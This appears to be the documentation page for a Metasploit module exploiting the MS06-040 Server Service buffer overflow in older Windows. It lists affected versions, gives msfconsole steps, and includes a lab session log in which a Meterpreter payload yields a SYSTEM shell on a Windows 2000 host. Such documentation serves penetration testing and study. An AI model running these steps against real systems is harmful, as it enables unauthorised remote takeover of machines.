2.1 KiB
2.1 KiB
Vulnerable Application
This module exploits a stack buffer overflow in the NetApi32 CanonicalizePathName() function using the NetpwPathCanonicalize RPC call in the Server Service. It is likely that other RPC calls could be used to exploit this service. This exploit will result in a denial of service on Windows XP SP2 or Windows 2003 SP1. A failed exploit attempt will likely result in a complete reboot on Windows 2000 and the termination of all MB-related services on Windows XP. The default target for this exploit should succeed on Windows NT 4.0, Windows 2000 SP0-SP4+, Windows XP SP0-SP1 and Windows 2003 SP0.
Verification Steps
- Start msfconsole
- Do:
use modules/exploits/windows/smb/ms06_040_netapi - Do:
set RHOSTS [IP] - Do:
set PAYLOAD [payload] - Do:
set LHOST [IP] - Do:
set LPORT [port] - Do:
run
Scenarios
A run against Windows 2000 (Build 2195, SP4) and Kali Linux 2019.3
msf exploit(windows/smb/ms06_040_netapi) > use modules/exploit/windows/smb/ms06_040_netapi
msf exploit(windows/smb/ms06_040_netapi) > set RHOSTS 192.168.1.2
msf exploit(windows/smb/ms06_040_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf exploit(windows/smb/ms06_040_netapi) > exploit
[*] 192.168.1.2:445 - Detected a Windows 2000 target
[*] 192.168.1.2:445 - Binding to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.1.2[\BROWSER] ...
[*] 192.168.1.2:445 - Bound to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.1.2[\BROWSER] ...
[*] 192.168.1.2:445 - Building the stub data...
[*] 192.168.1.2:445 - Calling the vulnerable function...
[*] Started bind TCP handler against 192.168.1.2:4444
[*] Sending stage (180291 bytes) to 192.168.1.2
[*] Meterpreter session 1 opened (192.168.1.3:39603 -> 192.168.1.2:4444) at 2019-12-02 11:48:52 -0700
meterpreter > sysinfo
Computer : PC-B43791F5F5
OS : Windows 2000 (5.0 Build 2195).
Architecture : x86
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM